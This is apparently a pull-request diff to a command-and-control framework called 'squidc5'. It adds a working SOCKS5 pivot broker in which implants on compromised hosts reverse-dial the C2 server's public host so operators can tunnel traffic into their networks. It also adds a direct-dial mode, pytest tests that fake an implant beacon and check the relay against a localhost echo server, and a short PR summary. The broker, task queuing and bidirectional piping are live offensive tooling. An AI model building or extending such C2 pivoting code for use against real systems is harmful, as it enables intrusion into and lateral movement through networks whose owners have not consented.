         listen_host: str = "127.0.0.1",
         listen_port: int = 0,
+        mode: str = "implant",
     ) -> dict[str, Any]:
-        """Bind a local SOCKS5 placeholder that accepts then closes (lab stub).
-
-        Full relay requires implant SOCKS agent; this registers the pivot and
-        port for operators while implant task `socks:start` is delivered.
-        """
         pid = f"socks_{secrets.token_hex(6)}"
+        mode = mode if mode in ("implant", "direct") else "implant"
+        pivot = SocksPivot(
+            id=pid,
+            session_id=session_id,
+            listen_host=listen_host,
+            listen_port=0,
+            mode=mode,
+            status="starting",
+        )
 
-        async def _handler(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
+        async def _data_handler(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
+            """Implant opens data channel: first line = conn_id\\n then raw TCP bridge."""
             try:
-                # Minimal SOCKS5 greeting consume then close (no relay yet)
-                await asyncio.wait_for(reader.read(262), timeout=5.0)
-                # reply: ver=5 method=no-auth not available
-                writer.write(b"\x05\xff")
-                await writer.drain()
+                header = await asyncio.wait_for(reader.readline(), timeout=15.0)
+                conn_id = header.decode("utf-8", errors="replace").strip()
+                fut = pivot.pending.pop(conn_id, None)
+                if fut and not fut.done():
+                    fut.set_result((reader, writer))
+                else:
+                    writer.close()
+                    await writer.wait_closed()
             except Exception:
-                pass
+                try:
+                    writer.close()
+                    await writer.wait_closed()
+                except Exception:
+                    pass
+
+        data_server = None
+        data_port = 0
+        if mode == "implant":
+            data_server = await asyncio.start_server(_data_handler, host="0.0.0.0", port=0)
+            dsocks = list(data_server.sockets or [])
+            data_port = int(dsocks[0].getsockname()[1]) if dsocks else 0
+            pivot.data_server = data_server
+            pivot.data_port = data_port
+            asyncio.create_task(data_server.serve_forever(), name=f"socks-data-{pid}")
+
+        async def _socks_handler(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
+            try:
+                await self._handle_socks_client(pivot, reader, writer)
+            except Exception as e:
+                log.debug("socks client error: %s", e)
             finally:
                 try:
                     writer.close()
@@ -66,33 +111,151 @@ class SocksBroker:
                 except Exception:
                     pass
 
-        server = await asyncio.start_server(_handler, host=listen_host, port=listen_port)
+        server = await asyncio.start_server(_socks_handler, host=listen_host, port=listen_port)
         socks = list(server.sockets or [])
         port = int(socks[0].getsockname()[1]) if socks else listen_port
-        pivot = SocksPivot(
-            id=pid,
-            session_id=session_id,
-            listen_host=listen_host,
-            listen_port=port,
-            status="listening",
-            server=server,
-        )
+        pivot.server = server
+        pivot.listen_port = port
+        pivot.status = "listening"
         self._pivots[pid] = pivot
         asyncio.create_task(server.serve_forever(), name=f"socks-{pid}")
+
+        hint_args: dict[str, Any] = {
+            "pivot_id": pid,
+            "socks_port": port,
+            "data_port": data_port,
+            "data_host": self.public_host,
+            "mode": mode,
+        }
         return {
             "id": pid,
             "session_id": session_id,
             "listen_host": listen_host,
             "listen_port": port,
+            "data_port": data_port,
+            "mode": mode,
             "status": "listening",
-            "task_hint": {"command": "socks:start", "args": {"pivot_id": pid, "port": port}},
+            "task_hint": {"command": "socks:start", "args": hint_args},
         }
+
+    async def _handle_socks_client(
+        self,
+        pivot: SocksPivot,
+        reader: asyncio.StreamReader,
+        writer: asyncio.StreamWriter,
+    ) -> None:
+        # greeting
+        hdr = await asyncio.wait_for(reader.readexactly(2), timeout=10.0)
+        ver, nmethods = hdr[0], hdr[1]
+        if ver != 5:
+            return
+        await asyncio.wait_for(reader.readexactly(nmethods), timeout=10.0)
+        writer.write(b"\x05\x00")  # no auth
+        await writer.drain()
+
+        req = await asyncio.wait_for(reader.readexactly(4), timeout=10.0)
+        if req[0] != 5 or req[1] != 1:  # CONNECT
+            writer.write(b"\x05\x07\x00\x01\x00\x00\x00\x00\x00\x00")
+            await writer.drain()
+            return
+        atyp = req[3]
+        if atyp == 1:  # IPv4
+            raw = await reader.readexactly(4)
+            host = ".".join(str(b) for b in raw)
+        elif atyp == 3:  # domain
+            ln = (await reader.readexactly(1))[0]
+            host = (await reader.readexactly(ln)).decode("utf-8", errors="replace")
+        elif atyp == 4:  # IPv6
+            raw = await reader.readexactly(16)
+            host = ":".join(f"{raw[i]:02x}{raw[i+1]:02x}" for i in range(0, 16, 2))
+        else:
+            writer.write(b"\x05\x08\x00\x01\x00\x00\x00\x00\x00\x00")
+            await writer.drain()
+            return
+        port = struct.unpack("!H", await reader.readexactly(2))[0]
+
+        if pivot.mode == "direct":
+            try:
+                r2, w2 = await asyncio.wait_for(asyncio.open_connection(host, port), timeout=15.0)
+            except Exception:
+                writer.write(b"\x05\x05\x00\x01\x00\x00\x00\x00\x00\x00")
+                await writer.drain()
+                return
+            writer.write(b"\x05\x00\x00\x01\x00\x00\x00\x00\x00\x00")
+            await writer.drain()
+            await self._pipe(reader, writer, r2, w2)
+            return
+
+        # implant reverse-dial
+        conn_id = secrets.token_hex(8)
+        loop = asyncio.get_running_loop()
+        fut: asyncio.Future = loop.create_future()
+        pivot.pending[conn_id] = fut
+        if self.enqueue_task:
+            try:
+                await self.enqueue_task(
+                    pivot.session_id,
+                    "socks:connect",
+                    {
+                        "conn_id": conn_id,
+                        "host": host,
+                        "port": port,
+                        "data_host": self.public_host,
+                        "data_port": pivot.data_port,
+                    },
+                )
+            except Exception as e:
+                pivot.pending.pop(conn_id, None)
+                log.warning("socks enqueue failed: %s", e)
+                writer.write(b"\x05\x01\x00\x01\x00\x00\x00\x00\x00\x00")
+                await writer.drain()
+                return
+        try:
+            implant_reader, implant_writer = await asyncio.wait_for(fut, timeout=45.0)
+        except Exception:
+            pivot.pending.pop(conn_id, None)
+            writer.write(b"\x05\x05\x00\x01\x00\x00\x00\x00\x00\x00")
+            await writer.drain()
+            return
+        writer.write(b"\x05\x00\x00\x01\x00\x00\x00\x00\x00\x00")
+        await writer.drain()
+        await self._pipe(reader, writer, implant_reader, implant_writer)
+
+    async def _pipe(
+        self,
+        a_r: asyncio.StreamReader,
+        a_w: asyncio.StreamWriter,
+        b_r: asyncio.StreamReader,
+        b_w: asyncio.StreamWriter,
+    ) -> None:
+        async def copy(src: asyncio.StreamReader, dst: asyncio.StreamWriter) -> None:
+            try:
+                while True:
+                    data = await src.read(65536)
+                    if not data:
+                        break
+                    dst.write(data)
+                    await dst.drain()
+            except Exception:
+                pass
+            finally:
+                try:
+                    dst.close()
+                except Exception:
+                    pass
+
+        await asyncio.gather(copy(a_r, b_w), copy(b_r, a_w))
 
     async def stop(self, pivot_id: str) -> bool:
         p = self._pivots.pop(pivot_id, None)
         if not p:
             return False
-        if p.server:
-            p.server.close()
-            await p.server.wait_closed()
+        for fut in list(p.pending.values()):
+            if not fut.done():
+                fut.cancel()
+        p.pending.clear()
+        for srv in (p.server, p.data_server):
+            if srv:
+                srv.close()
+                await srv.wait_closed()
         return True

--- a/tests/test_socks_duplex.py
+++ b/tests/test_socks_duplex.py
@@ -1,0 +1,111 @@
+"""SOCKS5 direct mode + broker registration (implant mode wiring)."""
+
+from __future__ import annotations
+
+import asyncio
+import struct
+
+import pytest
+from httpx import ASGITransport, AsyncClient
+
+from squidc5.config import Settings
+from squidc5.main import create_app
+
+ADMIN = "sc5_test_admin_token_bootstrap_socks2"
+
+
+async def _socks5_connect(host: str, port: int, dest_host: str, dest_port: int) -> bytes:
+    reader, writer = await asyncio.open_connection(host, port)
+    writer.write(b"\x05\x01\x00")
+    await writer.drain()
+    greet = await reader.readexactly(2)
+    assert greet == b"\x05\x00"
+    # CONNECT domain
+    req = b"\x05\x01\x00\x03" + bytes([len(dest_host)]) + dest_host.encode() + struct.pack(
+        "!H", dest_port
+    )
+    writer.write(req)
+    await writer.drain()
+    resp = await reader.readexactly(10)
+    writer.close()
+    await writer.wait_closed()
+    return resp
+
+
+@pytest.mark.asyncio
+async def test_socks_direct_connect_localhost(tmp_path):
+    """Direct mode: C2 dials target (echo server)."""
+    # tiny echo server
+    async def echo(r, w):
+        data = await r.read(100)
+        w.write(data)
+        await w.drain()
+        w.close()
+
+    echo_srv = await asyncio.start_server(echo, "127.0.0.1", 0)
+    echo_port = echo_srv.sockets[0].getsockname()[1]
+
+    settings = Settings(
+        data_dir=tmp_path / "d",
+        debug=True,
+        mcp_enabled=False,
+        admin_token_bootstrap=ADMIN,
+        plugin_signing_secret="test-plugin-signing-secret-for-ci",
+        implant_require_auth=False,
+        rate_limit_per_minute=3000,
+        public_host="127.0.0.1",
+    )
+    app = create_app(settings)
+    async with app.router.lifespan_context(app):
+        transport = ASGITransport(app=app)
+        async with AsyncClient(transport=transport, base_url="http://test") as client:
+            h = {"Authorization": f"Bearer {ADMIN}"}
+            b = await client.post("/api/v1/implant/beacon", json={"hostname": "s"})
+            sid = b.json()["session_id"]
+            r = await client.post(
+                "/api/v1/pivot/socks",
+                headers=h,
+                json={
+                    "session_id": sid,
+                    "listen_host": "127.0.0.1",
+                    "listen_port": 0,
+                    "mode": "direct",
+                },
+            )
+            assert r.status_code == 200, r.text
+            sport = r.json()["listen_port"]
+            assert r.json()["mode"] == "direct"
+            resp = await _socks5_connect("127.0.0.1", sport, "127.0.0.1", echo_port)
+            assert resp[0] == 5 and resp[1] == 0  # success
+            await client.delete(f"/api/v1/pivot/socks/{r.json()['id']}", headers=h)
+    echo_srv.close()
+    await echo_srv.wait_closed()
+
+
+@pytest.mark.asyncio
+async def test_socks_implant_mode_registers_data_port(tmp_path):
+    settings = Settings(
+        data_dir=tmp_path / "d2",
+        debug=True,
+        mcp_enabled=False,
+        admin_token_bootstrap=ADMIN + "b",
+        plugin_signing_secret="test-plugin-signing-secret-for-ci",
+        implant_require_auth=False,
+        rate_limit_per_minute=3000,
+        public_host="127.0.0.1",
+    )
+    app = create_app(settings)
+    async with app.router.lifespan_context(app):
+        transport = ASGITransport(app=app)
+        async with AsyncClient(transport=transport, base_url="http://test") as client:
+            h = {"Authorization": f"Bearer {ADMIN}b"}
+            b = await client.post("/api/v1/implant/beacon", json={"hostname": "s2"})
+            sid = b.json()["session_id"]
+            r = await client.post(
+                "/api/v1/pivot/socks",
+                headers=h,
+                json={"session_id": sid, "mode": "implant"},
+            )
+            assert r.status_code == 200, r.text
+            assert r.json()["data_port"] > 0
+            assert r.json()["task_hint"]["args"]["data_port"] > 0


### PR DESCRIPTION
## Summary
- SOCKS5 duplex (implant reverse-dial + direct)
- Fixed README badges (workflow SVG badges)
- Docs/runbook/five-star roadmap/CHANGELOG updated
- Local Ollama fallback for Admin AI
- Unit tests for SOCKS

## Test plan
- [x] pytest (incl. test_socks_duplex)
- [ ] CI + SquidGate green